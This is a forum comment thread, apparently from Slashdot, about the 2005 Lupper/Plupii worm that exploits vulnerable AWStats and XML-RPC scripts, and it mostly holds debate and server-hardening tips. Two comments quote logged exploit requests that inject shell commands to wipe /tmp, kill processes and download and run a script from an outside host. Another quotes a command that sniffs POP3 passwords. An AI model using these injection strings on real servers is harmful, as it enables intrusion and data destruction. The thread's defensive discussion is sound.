Oh, you'll have the right libraries, but that's not enough; you have to have the latest and greatest _versions_ of each of them. For instance, you need Pango 1.10.2 or higher; if you're still using an earlier release of Pango, you'll have to install the latest one, which will also require you to upgrade your X server to x.Org 6.8.3 or later. Note also that if you have an ATI or nVidia graphics card, or certain models of Matrox cards, the drivers have not yet been updated for 6.8.3, so you will have to wait for that. Also you will need a glibc version that is current from CVS within the last couple of weeks.

Re:I'm not worried...

[jonadab]

> Oh, you'll have the right libraries, but that's not enough; you
> have to have the latest and greatest _versions_ of each of them.

Incidentally, Debian users are completely immune to this worm ;-)

this isn't meant for us

[caffeinemessiah]

Whichever av company it was that put out this release, it clearly isn't meant for anyone who's ever used *nix. This message is aimed at potential corporate *nix adopters for whom the lack of viruses might have been a strong selling point. I'm willing to put serious money that there's some lobby cash behind this. This is just like Bush's war - no one with a brain believes its right, but the majority without the brains do, and that's all thats needed. It's disgusting.

Re:this isn't meant for us

you're a retard trying to bring politics into a discussion over a computer virus, people like you are "disgusting"

Please Rate This Worm Info!!

[handmedowns]

http://vil.nai.com/vil/RateThisPage.asp

Let Mcaffe know how well they're trolling.

Re:Please Rate This Worm Info!!

[jjMick]

Result when rating: "Page Not Found The page you are looking for is temporarily unavailable or no longer exists." McAfee really sucks!

Re:Please Rate This Worm Info!!

[pintpusher]

YOu need to link to that page from the original virus description... then it works fine.

Did some more research

[jurt1235]

McAfee sucks for real info, look at symantec or at my at summary. In short: Update your software on time. There are some small inconsistencies between what the worm attacks and what needs to be updated though.

It's a Linux worm? Riiiiiiight....

[crivens]

It's a Linux worm? Riiiiiiight.... I wonder who originally raised this with McAfee.

More coverage Linux.Plupii description available

[jjMick]

Symantec has a more coverage description page at http://securityresponse.symantec.com/avcenter/venc /data/linux.plupii.html including links to XML-RPC PHP1.x library vulnerabilities used by this malware. This worm is also known as Linux.Plupii and Linux/Lupper.A too. Internet Storm Center has a lot of technical information at their http://isc.sans.org/diary.php?storyid=823

Other links

[AndroidCat]

Security Focus eWeek CNet

Linux/BSD only

[WhiteWolf666]

Currently, this worm is only compatible with Linux/BSD systems, because they are the only systems with full shell scripting capabilities.

It is rumored that you can obtain the same level of compatibility with the Cygwin Suite, but that is not an officially supported configuration by Microsoft.

Never fear, though, Monad will bring Lupper, and similar PHP/Shell script worms to the Windows platform for the masses!

Seriously, though; isn't everyone fairly aware that PHP ain't that secure?

Re:Linux/BSD only

[mysqlrocks]

Seriously, though; isn't everyone fairly aware that PHP ain't that secure?

No, PHP is secure. Some applications written in PHP are insecure. Programmers can introduce security vulnerabilities in any language. Bad programming is not language specific.

Re:Linux/BSD only

[WhiteWolf666]

Fair enough. That's the correct way to say it.

Re:Linux/BSD only

[b10m]

Bad programming is not language specific.

Nope, but certain languages are notorious in attracting bad, horrible coders. If you can spell the letters "PHP" you are a card-carrying member of the 1337 club with m4d ski11z...

Perl used to have this problem, thank god they all now moved to PHP (well, most of them)

Re:Linux/BSD only

[mysqlrocks]

Nope, but certain languages are notorious in attracting bad, horrible coders.

And what languages are these? The ones that are easier to learn. Therefore, you have more inexperienced programmers coding in these languages. This is a good thing in my book. Programming languages that are easily accessible (such as PHP) attract more people to programming in general. Do you want to hire an inexperienced programmer to build your e-commerce site? Probably not. Do we want to continual attract people to the field of programming? Probably yes. This is what languages like PHP do. I learned PHP before I learned Java (and yes I do mean Java - not JavaScript), for example. Would I have learned Java if I hadn't learned PHP first. Maybe, maybe not. The point is that most people can't just jump into an advanced language like Java or C++ but these "beginner" languages make the transition into higher-level programming possible.

Re:Linux/BSD only

[GigsVT]

I don't think PHP is all that easy to learn. It may have seemed easier if you knew C/C++ syntax first, which a lot of us did.

Re:Linux/BSD only

[petermgreen]

i think the key is php is easy to learn incrementally. you can start with a tiny chunk of code, drop it in your webpage and it will actually do something and if you look at tutorials for php they all seem to be geared this way (i found this highly annoying as someone who can program and wanted to change something in a major php program, all the php tutorials i could find were not programmer orientated).

Re:Linux/BSD only

[m50d]

Programmers can introduce security vulnerabilities in any language. Bad programming is not language specific.

True, however some languages are easier to introduce flaws in than others - when was the last time you saw a buffer overflow in a modern language? They do happen but only occasionally. PHP programs seem to have flaws far more often than others.

Re:Linux/BSD only

php makes it ridiculously easy to make things insecure without noticing -- more so than even c

Re:Linux/BSD only

[jonadab]

> No, PHP is secure. Some applications written in PHP are insecure.

s/some/most/;

It is true (at least for the most part) that programmers who understand security do not need to be afraid of programming in PHP, any more than any other language.

The reason *more* PHP apps are insecure than others is primarily because a lot of people pick up PHP with no former programming background at *all*. It looks (vaguely) like HTML, so they have the confidence to start programming. This would not be a big deal, except that then some of them *distribute* what they have done and *other* people use it. The Perl world has Matt's Script Archive, which is infamous, but in the PHP world there's a *LOT* of this sort of thing going on.

There is also one additional issue, not related per-se to the language but nevertheless PHP specific in that it is related to the PHP software and the way it is normally installed, an issue that has an impact on the defense in depth of systems with PHP installed. Namely, the server will (at least typically) happily execute PHP scripts from *any* (served) directory, not just specific ones, and it will do so even if those scripts do not have their execute bit set at the filesystem level. This is, IMO, a design flaw from a security perspective, and should be changed; PHP execution/interpretation should be enabled on a per-directory or per-subtree basis, and individual files should NOT be executed or interpreted by PHP unless they have their execute permission set. The Open Clip Art Library was not long ago bitten by an interaction between this issue and an overly-permissive submission upload script; the upload script is being corrected, but correcting both would provide better defense in depth.

a decent description

[munkt0n]

a decent description can be found here http://isc.sans.org/diary.php?storyid=823

Only one response

[cout]

This is all I have to say:

http://www.gotwavs.com/0078546128/MP3S/TV_Shows/Si mpsons/haha.mp3

Well .....

I already have tcpflow -c port 110 |grep -i pass running in a spare VC. Perhaps now I ought to have tcpflow -c port 80 running in another spare VC at all times, just in case. But I'm going to run out of VCs soon!

More info

[max+born]

According to MacAfee its: It is a modified derivative of the Linux/Slapper ...

And according to a 2002 cert advisory the slapper worm appears to work only on Linux systems running Apache with the OpenSSL module (mod_ssl) on Intel architect..

Surprisingly their seem to be no mention of it a apache.org which leads me to think it's pretty benign and not wide spread. I could be wrong.

Gnu!

[rabel]

That's Gnu/Linux worm to you, you insensitive clod!

no login shell

[Understudy]

If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.

1. don't permit external shell access through you www accounts. Make all you www accounts shell be /usr/bin/false. I realize that some people need cli access but it should be severly limited in it's functions and only used by those who have a real need.
2. don't permit php/cgi scripts that are explotiable. Okay that is a broad general statement , however there are well known malicious scripts and well known explotiable scripts. Don't allow them. And certainly don't allow them if cli access is being used.
3. do apply your security patches (after testing).
4. Host with a good website company like 34sp.com (shameless plug with who I am hosted on)

Re:no login shell

[Alioth]

With this exploit, it doesn't matter what the user's shell is set to (the exploit will most likely run as user 'nobody').

If you give people CGI access, you have essentially given them shell access (doubly so if you use mod_suexec so the CGI programs run as their username), and changing the user's shell to /usr/bin/false is entirely ineffective. You need to be using SElinux, not have tools like 'wget' installed, and have strict egress filtering on your web server if you want to neutralise the shell accounts that your users can gain themselves.

Re:no login shell

You need to be using SElinux, not have tools like 'wget' installed, and have strict egress filtering on your web server if you want to neutralise the shell accounts that your users can gain themselves.

Surely you could just chmod wget (and others) to 0750 (maybe 0754). And make wget's group one of trusted users?

Re:no login shell

[Understudy]

Yes cgi access gives them a virtual shell, you can control how it functions.
You should be using mod_security.
http://understudy.net/tutorials.php?name=wget comes back failed You can run limited ablity shell accounts such as scponlyc (chrooted version of scponly)

And the servers I run on are all FreeBSD based.

Mod security can be found here:
http://modsecurity.org/
http://www.gotroot.com/tiki-index.php?page=mod_sec urity+rules
http://www.onlamp.com/pub/a/apache/2003/11/26/mod_ security.html

Re:no login shell

[Alioth]

No. Chmodding wget will stop wget working. Although this will frustrate automated scripts and probably worms, it won't stop your own users from writing a CGI script that does what wget does. Or even a more advanced cracker from doing just the same.

However, you can use SElinux to limit what programs can create and use sockets. If you create a SElinux policy that forbids sockets and apply it to anything that Apache is going to load, and probably Apache itself, you can close off that vulnerability. Alternately (or in addition) you can use iptables rules to prevent outbound access (i.e. egress filtering).

I think another article recently pointed this out - but enumerating badness often doesn't work. The stance you really need to take is everything is bad unless I specifically say it is good - i.e. take a position of 'default deny'. How strong your default deny position is depends on what kind of service you are running. However, strong egress filtering is possible for virtually every web server without breaking the stuff that should legitimately be running.

clearly a violation

[FudRucker]

if this worm does not include the sourcecode with every computer it infects it is violating the terms and conditions of the GNU/GPL

Simple but effective hardening measures

[dskoll]

Here are some simple things you can do to harden your server. Note that they are not a substitute for actually fixing or removing broken scripts, but they can buy you time.

• Enable SELinux. However, if you're running these kinds of scripts, you probably aren't protected by SELinux.
• Mount /tmp with the noexec flag. Again, not complete protection if the malware is a script (because it can be invoked explicitly with the command interpreter), but it would stop this particular one.
• Change the permissions on wget so that apache can't read or execute it. Or, remove wget completely from your server. Similarly for rsync, ncftp, etc.

Re:Simple but effective hardening measures

Mount /tmp with the noexec flag. Again, not complete protection if the malware is a script (because it can be invoked explicitly with the command interpreter), but it would stop this particular one.

You may want to do the same for /var/tmp since that's another world-writable directory. Other good options would be nodev and nosuid.

The following command (run as root) should find the most common ones:

find / -type d -perm +1000

It's not Windows

[max+born]

From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.

Apche usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in /tmp.

Re:It's not Windows

[tomhudson]

From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.

Apche usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in /tmp.

While you're right in principle, wouldn't it be an indication that maybe its time to upgrade the box? Its not like there haven't been fixes for these problems for months and months (one of them since February).

Now, unlike Windows, its usually quicker to install a fresh copy than it is to do an upgrade (you *do* have backups of your data, right?).

Re:It's not Windows

[archen]

*sigh*

Here is advice to anyone who is a sysadmin on an affected system.

set up /tmp as a filesystem and set it to noexec in fstab. You'll stop a surprising ammount of exploits that may affect systems you fail to secure.

Re:It's not Windows

*sigh*

/usr/bin/perl /tmp/script.pl

Re:It's not Windows

[51mon]

It is called privilege escalation.

Once any system is compromised, you have generally to assume that the attacker escalated their privileges using other exploits. If you had auditing enabled, you might be able to demonstrate that this did not happen, but if you had auditing enabled you probably reinstalled already!

The problem with these sorts of compromise, is in some shared hosting environments, where the end user could have installed vulnerable PHP. So doesn't really matter how good the admin, or OS is, unless the OS has specific facilities to mitigate this sort of attack.

I wouldn't take people seeing awstats attempts as proof of the worm, I've been seeing awstats exploit attempts for years, that is usually just run of the mill hacking attempts, semiautomated scanning, or earlier worms.

Re:It's not Windows

[phiwum]

What, Linux has no privilege escalation problems?

I got bitten by the awstats bug last February and a rootkit was installed before I knew it. In fact, two kits were installed when I figured out something funny was going on (two unexpected reboots in a month).

It's not Windows, but if you're not on top of things, you sure as heck can get rooted via a web exploit. The fact that Apache runs as nobody doesn't help if your installation has a privilege escalation vulnerability.

Re:It's not Windows

Saw an exploit like this happen on a RH9 box. It exploited an unpatched copy of wordpress. It downloaded uselib24 to /tmp and by the time I saw it, the machine was at a load of 4 trying to execute a race-condition kernel exploit. It had trojaned /sbin/ifconfig too.

So when you say, "no need to wipe the box," please reconsider that worms like this are downloading things like kernel exploits, waiting for you to issue a command as root. Better have your boxes outfitted with an aide/tripwire database to see where your permissioning was weak.

Re:It's not Windows

[budgenator]

first you must Disable the System Restore Utility; yup that's right the wipeing and reinstall applies to windows.

Re:It's not Windows

Yes and you can still execute binary programs in tmp as well, however this will still trip up MANY exploits such as this.

Why Linux is still more secur

[ZachPruckowski]

Unless I misundersand the article and comments, it seems that

Safety of Linux user who screws up >> MS user who does everything right

Yah! A Worm!

[barefootgenius]

Now I have something to do with this O.S. that I don't seem able to kill with normal usage.
Which packages do I have to install? I'm feeling nostalgic for Windows.

linux? sounds like apache+php

[Cheeze]

sounds to me like an apache with php problem.

I don't see how that would make it a linux worm. Does this "worm" also work on Solaris, HPUX, AIX, and other apache and php aware operating systems?

sounds to me like a new version of the old formmail.pl problem.

Re:linux? sounds like apache+php

[jonadab]

> Does this "worm" also work on Solaris, HPUX, AIX,
> and other apache and php aware operating systems?

This specific worm in its current form does not, because its binary is Linux-specific. However, the vulnerabilities that this worm exploits are in specific scripts, and the vulnerabilities are probably present on all platforms that those scripts support, which almost certainly includes more than just Linux, meaning that the worm could be modified to work on those platforms.

However, since the worm is not at all widespread running on Linux systems, I rather doubt making it work with HPUX or AIX will make it much more widespread.

> sounds like a new version of the formmail.pl problem.

Yes, it's VERY similar to that.

Re:linux? sounds like apache+php

[Cheeze]

Sounds more like a distribution problem and less of a linux problem.

If a distribution packages insecure scripts in their packages, they should be the ones getting pointed at.

It would probably be pretty easy to modify the worm to use a bash script or something that would be common on all unixes, bsds, and linux distributions. Then it might become a problem, but until then, it's pretty weak.

Re:linux? sounds like apache+php

[jonadab]

> Sounds more like a distribution problem and less of a linux problem.

It's neither. The vulnerabilities are in third-party scripts that are not, as far as the article indicates, part of the default install on any distribution. (That's why it's not widespread.) The reason "Linux" was mentioned is just because the worm's code happens to have been compiled for that kernel.

An easy, temporary fix

[MirrororriM]

Set up a cron to run at 1 minute intervals to rm -rf /tmp/lupii

Quite simple really.

Re:An easy, temporary fix

Actually, this would only work if cron job happened to delete the file in the milisecond between when the download finished and the script was run. Deleting the file descriptor of a running process doesn't stop the process.

Re:An easy, temporary fix

[Jason+Hildebrand]

I'd recommend actually fixing the vulnerable scripts, but if you like hackish, temporary solutions, here's a better one:

# rm -f /tmp/lupii
# touch /tmp/lupii
# chown root: /tmp/lupii
# chmod go-rx /tmp/lupii

(i.e. create a harmless file which can't be overwritten; which will prevent the worm from installing itself. This assumes you don't run apache as root. God help you if you do.)

Re:An easy, temporary fix

if the directory is writable by the apache user, then it doesn't matter what you set the perms of the file to. /tmp defaults to 1777 on nearly every linux system.

Re:An easy, temporary fix

[Tmack]

ehhh, lets test this theory:

#ls -l /
...
drwxrwxrwt 14 root root 36864 Nov 8 11:28 tmp/
...
#touch /tmp/lupii
#chmod 000 /tmp/lupii
#ls -l /tmp/lupii
---------- 1 root root 0 Nov 8 11:28 /tmp/lupii
#exit

$rm /tmp/lupii
rm: remove write-protected regular empty file `/tmp/lupii'? yes
rm: cannot remove `/tmp/lupii': Operation not permitted

$ls -l /tmp/lupii
---------- 1 root root 0 Nov 8 11:28 /tmp/lupii

tm

Re:An easy, temporary fix

[codepunk]

What where did you go to school? It don't make a damn what the directory permissions
are if the file had write permissions removed from everyone end of story..

Re:An easy, temporary fix

[Fred+Foobar]

Look at the permissions of your /tmp directory. It ought to have the sticky bit set, which doesn't allow just anyone to remove everyone's files.

Re:An easy, temporary fix

[MirrororriM]

Look at the permissions of your /tmp directory. It ought to have the sticky bit set, which doesn't allow just anyone to remove everyone's files.

Yeah, but cron jobs can be ran as root, so I'm sure that would trump any other permissions...unless I'm missing something.

Anywho...it was just a quick fix until a patch is created (assuming that the machine owner isn't a programmer).

Sad, really

[httptech]

This is probably going to re-occur now that a precedent is set. Prepare for every new PHP exploit that comes out to be bundled with Slapper like this. It will probably become the Rbot of the Linux world.

Even more sad, the AV companies couldn't even detect that this was 95% Slapper code! C'mon, the kiddie who released this didn't even strip the debug symbols much less pack it in any way.

With that said, my writeup of the worm is here:

http://www.lurhq.com/slapperv2.html

Includes some previously unreleased facts about who wrote most of the code recycled in Slapper and in Lupper.

Linux worm?

[netkid91]

Not EXACTLY a *nix worm, but rather a PHP hole, the executable can only be run on a *nix platform however, so the PHP EXPLOIT goes for all platforms with PHP nad unpatched scripts, but the executable the worm uploads and executes is most likley a shell script or *nix executable, SO if the creator wanted he/she COULD have it check what OS the server is running and upload/exec a OS-specific binary.

Funny

If you want to see a total lack of security, don't look at MS. Just post something derogatory of Linux, and watch the geeks line up to find excuses. I've never seen so much insecurity in my life. Posting anonymously because they will now take their insecurity out on me, even though it's not my fault they're incapable of accepting criticism.

Netcraft Reports 'BSD Not Affected...

[Dystopian+Rebel]

because BSD is confirmed dead.'

LupperLinux...

[sweetnjguy29]

...as a new distro sounds catchy, doesn't it?

Um...

[sootman]

one more thing: accorting to the not-very-fine article, the exploit requires one of the following ports listening: UDP 7111, UDP 7222.

So, once again, a firewall that blocks EVERYTHING, EXCEPT things you want open (like 80 and 22) will prevent this, right? Seems to me that slapper (which affected Apache with mod_ssl and 443 open, IIRC) was much more dangerous.

Re:Um...

[jehiah]

No... those are SYMPTOMS... as in you've been had already.

Re:Um...

[sootman]

Oops, missed that. Thanks. But still, if the worm somehow depends on those ports, wouldn't a firewall keep it from fulfilling its purpose (i.e., "accepting remote commands")? I can't imagine the worm opens those ports and then doesn't need them.

I'm waiting for a worm that determines you're behind, say, a Linksys firewall, then does sustained dictionary attacks against 192.168.1.1 (username = blank, couldn't be easier!) and opens up the needed ports to the infected machine.

Re:Um...

[schon]

I'm waiting for a worm that determines you're behind, say, a Linksys firewall, then does sustained dictionary attacks against 192.168.1.1 (username = blank, couldn't be easier!) and opens up the needed ports to the infected machine.

Don't hold your breath - I suspect you'll be waiting a *long* time.

If you want a command shell, it would be much easier to open an outbound TCP session and attach a shell to it. This has already been done.

Re:Um...

[argent]

the exploit requires one of the following ports listening: UDP 7111, UDP 7222.

Why would you have either of these ports listening?

Or do you mean the payload listens on these ports?

an excerpt from my logs

I checked my logs and found the following:
[06/Nov/2005:18:13:39 -0500] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20 /tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20membe rs.lycos.co.uk/sugi/a.txt;perl%20a.txt;echo%20;rm% 20-rf%20a.txt*;echo| HTTP/1.1" 404 1030 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Why not get somebody to shut down members.lycos.co.uk/sugi/a.txt??

well, no

[diegocgteleline.es]

"according to MS" -> "According to MS when he's interested in not being accused of being a monopoly".

Microsoft could change their software to enable/disable the IE-dependent functions when IE is installed/uninstalled. Some apps use the ie com thingy (desktop background, html help, explore.exe's web view, media player) which is good, but that doesn't means it can't be removed (furthermore, IE design is ugly, someone can explain why they don't have a common "image format" com/ole/whatever object that desktop background can use instead of using IE as "kitchen sink")

When microsoft means "tighly integrate", it means "OMG! If we remove IE people won't be able to use a jpg as background and won't be able to read chm help!", but it doesn't means it can't be removed if they wanted, like if they couldn't move the .chm help to another format. Of course, since lawyers know nothing about computers and money in america's justice matters so much it has not been hard for microsoft to convince lawyers that IE can't be separated from windows.

Re:well, no

[jonadab]

> but that doesn't means it can't be removed

Indeed, IE can be removed (though it takes some doing; just attempting to delete its files in Windows Explorer, for instance, won't do the job; it's about as tricky as removing Outlook Express, though not, IMO, nearly as important to system security, so I often don't bother; whereas, I keep a batch file on my Perlmonks private scratchpad for removing OE, and running it is on my Windows Installation Checklist; it is available upon request, just /msg me on Perlmonks; I suspect it could be modified for IE with relative ease).

Preventative measures

[Alioth]

Well, firstly, I doubt this worm will be particularly widespread - the vast majority of sites use name-based virtual hosting, and this worm just uses the IP address. Obviously some systems (with the very outdated versions of the vulnerable programs) will be vulnerable. But this isn't really the point of what I'm thinking about.

The point is that if you run a server (of any OS) you can take preventative measures to stop the propagation of hacks/malware/trojans, even if you have users who install buggy PHP scripts. Some straightforward preventative measures are:

1. Ensure that the 'wget' (and any other similar utilities) command is NOT available to the user which cgi/php scripts are run as. Many hackers use an initial exploit to get into the machine, then wget the script or program they really want to run (such as the good old bindshell)
2. Mount /tmp (and anything else writeable by the script) no-exec (although there are ways around this, it will defeat many skript kiddies).
3. Implement rate limiting on the MTA that runs on the machine. Have the MTA shut down altogether if the mail queue is gigantic. This way, if someone does get in, and tries to spam with your machine, it won't get very far. It will also give you time to investigate the problem.
4. Use iptables! Only open ports that should be open. Also, use *egress* filtering too. If your server should not be contacting anything on port 80, say, except the Debian distro servers for apt, use iptables to stop outbound access to anything except those servers. Prevent all outbound access except where strictly needed.
5. Treat every local root exploit as if it was a remote root exploit. If you run a web server, there is *no such thing* as a local root exploit. All it takes is a buggy PHP script, and an attacker can try and elevate their privileges through the local root exploit.

Those 4 things will keep you safe against most of these cookie-cutter or skript kiddie attacks. But to go further:
6. Use SElinux to only allow Apache to access what it should access and nothing else. Particularly executables. Therefore, if someone manages to successfully wget their exploit script after exploiting the buggy PHP script, they can't actually run it because SElinux will prevent it from being run.
7. Use Xen to divide your server up. Put the web server (the most complex and most likely to be exploited) in a separate Xen-U instance to everything else. Then you can make sure that the only stuff installed on the instance is stuff strictly needed to run the web sites. You can also do much more agressive filtering with iptables - so for instance, if you put the MTA on another Xen-U, plus all the other services you need (DNS etc). you can make it so the web server needs to have no egress *at all* except via the services on the other xen-U. This makes it essentially impossible for someone to use an exploit to download and run another script on your web server - they can't even change the port number of their webserver (say, to 25) to allow them to get the file they need.

I have had two serious attempts (i.e. NOT skript kiddies - the most recent one was a Romanian phishing group) to hack my (multi-user, shared hosting) web server in the last couple of years. They were both defeated by at least one of these techniques, and I learned from each. My web server is now divided into multiple Xen instances, and the HTTP server part has very strict egress rules.

Re:Preventative measures

[51mon]

> the vast majority of sites use name-based virtual hosting, and this worm just uses the IP address

Ah lightbulb goes on.

That maybe explains why the number of attempts to exploit awstats on our server was over 20 a day last week, but is now down to less than 4 a day. Shadow effect?

Have to say I had to search out our busiest webserver logs to find any exploit attempts at all against awstats, my own personal webserver doesn't have any, in any of the sites hosted, not exactly "Code Red" proportions ;)

Re:Preventative measures

[petermgreen]

the vast majority of sites use name-based virtual hosting
depends, if they are on commercial webhosing probablly but those run on home servers probablly won't unless the user wan'ts to host multiple sites.

Lupper? Isn't that a 3:00 pm meal...

[Biff+Stu]

It's not quite lunch, it's not quite supper; let's call it lupper!

Re:Lupper? Isn't that a 3:00 pm meal...

[chris_eineke]

I call it dunch. It's the sound it makes when it hits the bowl at 3am in the morning ;)

Remote Shell Commands?

In other words: If you are a complete idiot who allows remote shell commands through your cgi or PHP apps, you're vulnerable.

Who the hell would do such a thing?

bah

[Danzigism]

well its a good thing morons don't admin Linux servers.. because if it was anything like Windows, then this worm could have us in for a whole world of hurt..

This is the greatest worm ever!

[gosand]

Because it seems to only effect Linux and BSD systems (With a different worm). Other systems running PHP are not effected. So yes it is a linux worm. Like many of the Windows worms are not Windows Worms, but IE or OutLook Worms.

So wait, you are saying that the worm brings Linux and BSD systems into existence? That is amazing, and quite cool if you ask me!

Ohhhh, you meant "affect", not "effect". Someone attempting to be pedantic should choose their words carefully.

Re:This is the greatest worm ever!

[carlos_benj]

Someone attempting to be pedantic should choose their words carefully.

Dang! Now there's an exploit I've been bitten by on several occasions.....

Interesting description

I'm a windows admin and noticed something really funny. When a virus comes out on e of the first pieces of information you get is which platforms are vulnerable and under what conditions. Look at the difference between a Linux worm and a windows one.

Linux:
Linux running webservers, *IF* the target server is running one of the vulnerable scripts, and *IF* it has a specific url, and *IF* it is configured to permit external shell commands, and *IF* it is set to remote file download in the PHP/CGI environment, *THEN MAYBE* a copy of the worm could be downloaded and executed.

Windows:
This virus affects Win 3.1, Win95A, Win95B, Win95C, Win98, Win98SE, Win2000.....

If you are infected by this worm, you deserve it

[MrJerryNormandinSir]

If you are a sysadmin that knows what you are doing, this worm would not effect you.

Only partially.

[khasim]

Let's look at this logically.

If the Linux distribution does not run Apache by default, it is safe.
If Windows does not run IIS by default, it is safe.
So far, so good.

If the Linux distribution does not run PHP by default, it is safe.
If Windows does not run their scripting system by default, it is safe.
So far, so good.

If the Linux distribution does not run those particular scripts by default, it is safe.
If Windows does not run vulnerable scripts by default, it is safe.
So far, so good.

So, both Linux/Apache/PHP/scripts and Windows/IIS/scripting/scripts are as secure as each other in this particular instance.

Both can be made vulnerable by installing systems/scripts that are not part of the default system.

But most of the Windows compromises have not been from installing 3rd party vulnerable scripts. Historically, the compromises have come from system vulnerabilities that the admins have not patched, even when the patches are available.

The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.

Just because this one type would require the same actions on both systems does not mean that this type can be generalized to all exploits of both systems.

Re:Only partially.

[penguinrenegade]

The proof of security would lie more in whether or not your hosting company has patched for this or not. It might be trying, but come on, port 80?

Re:Only partially.

Yeah... your hosting company should block port 80. I mean, who would want HTTP requests made on their web server?

Re:Only partially.

[Blapto]

As a web server admin, patching to secure against this worm is trivial.
If you're the only user, you can rename the xmlrpc files.
Besides, your /tmp shouldn't have exec permissions anyway, and wget, curl, lynx etc. should be root use only.

Re:Only partially.

[froi]

The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.

That's not a valid metric, as it depends also on the number of systems in use with the respective OS.

AWStats is a PHP application?

[smartfart]

Um, AWStats isn't written in PHP, but in Perl. This isn't a PHP worm, it's a CGI exploit which happens to target PHP apps, plus the occasional Perl app.

Re:AWStats is a PHP application?

[mysqlrocks]

I'm not familiar with AWStats so it wasn't my intention to assert that it was a PHP application. Thank you for the correction. The comment that I responded to indicated that it was a PHP vulnerability (as did the article) and AWStats was listed as one of the vulnerable applications so I did the math. Apparently the variables I had to work with were wrong. I guess that's what happens when you assume.

This has been around a while?

[punka]

I just grep'd through my logs and found someone trying (perhaps beta-testing?) this exploit back in June 2005:

xx.xxx.xx.xx - - [18/Jun/2005:05:51:35 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;r m%20-rf%20*;killall%20-9%20perl;wget%20www.suxehac ker.home.ro/sess_3539283e27d73cae29fe2b80f9293f60; perl%20sess_3539283e27d73cae29fe2b80f9293f60;echo% 20;echo| HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Anyone know how to make /tmp noexec on OS X?

Re:This has been around a while?

[RichiP]

This isn't an answer to your question (re: OS X), but I think we should publish IP addresses from logs where the request came from. Most likely, it'll make people aware of yet another infected machine, but if we're lucky (or the author is careless) enough, we might even get the author's (or at least close to it) IP addresses.

Excellent precedent

[brlewis]

Hopefully from now on all worms and viruses will be named according to the OS they affect. I'm tired of hearing Windows worms/viruses referred to as if they were affecting all computers everywhere.

Re:If you are infected by this worm, you deserve i

[octaene]

if member of {Windows, Sysadmin} then not exist

Popularity != Security

[khasim]

This is not a flaw in Linux. It is a vulnerability in a script written in PHP that a sysadmin may install on a Linux box.

This has nothing to do with whether "valuable and important data" is stored on a Linux box.

If Linux was used by 10x more people/systems, there is no reason to believe that we'd see 10x more worms/viruses in the wild.

Yet every time the topic of a Linux worm/virus/trojan comes up, someone will make a comment about how it will only happen more as Linux becomes more popular.

Re:Popularity != Security

[Assmasher]

It will come up because it is true. As easily stop the tides. As for the worm, I didn't say it was a flaw in Linux, I was merely pointing out that security issues that affect Linux systems will rise as the success of Linux rises. Maybe you should mod that as 'master of the obvious', but it doesn't make it any less accurate.

Hence, the reason why...

[WindBourne]

the threat level is low to very low depending on reporting site and their need for money.

Looks like it's a Linux binary though

[Sycraft-fu]

So if you have a Windows, Solaris, OS-X, etc PHP system that has a problematic script, it could probably exploit and get in, but when it tried to run there'd be an error, since the OS wouldn't recognise the executable format. Other OSes that can do Linux binaries like FreeBSD could be potentially infected, but that's probably it. Also probably only works on x86 Linux, not PPC.

You're wrong.

[khasim]

It will come up because it is true.

No. It will keep coming up because people who don't understand security will keep bringing it up.

There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.

The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home.

As for the worm, I didn't say it was a flaw in Linux, I was merely pointing out that security issues that affect Linux systems will rise as the success of Linux rises.

That's what you believe. Yet my bank example shows that popularity has nothing to do with security.

Maybe you should mod that as 'master of the obvious', but it doesn't make it any less accurate.

That is because your statement is as inaccurate as possible already.

By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.

And security is why this worm will not do much damage.
http://securityresponse.symantec.com/avcenter/venc /data/linux.plupii.html

Look for "Number of Infections: 0-49".

Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!

What's that? "Number of Sites: 0-2"?

That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?

Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.

Re:You're wrong.

[Assmasher]

Anybody can make a ridiculous metaphor that makes something TOTALLY unrelated look accurate. You state "It will keep coming up because people who don't understand security will keep bringing it up" whilst simultaneously demonstrating that you don't understand security by using the bank/private residence example to mirror the issue we're discussing.

Banks aren't particularly secure, they simple require a different risk. I can walk into a bank with a gun and steal money. Now, depending upon how ruthless I wish to be, I could very likely get away with it (you'd be shocked how often banks are robbed successfully (in the short term.) The bank isn't more secure, the repercussions are more severe. This is what makes your analogy terrible.

The rest of your post is just as ridiculous.

Re:You're wrong.

[d34thm0nk3y]

Jeez, all of you guys have a problem with shades of gray. It is neither 100% popularity nor 0% popularity. It is a cost/benefit ratio. According to your logic 0 banks would be robbed since they have better security. Yet banks get robbed. Why? Because there exists someone for whom the extra money outweighs the extra risk.

Eventually we will reach a point where the target size will be large enough that it provides enough bang/buck to defeat the extra security.

Re:You're wrong.

[MisterMoney]

"By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular."

couldn't the logic be that homes, cars, and people are robbed more often because there are more of them than there are banks?

Confirmed in my neck of the woods

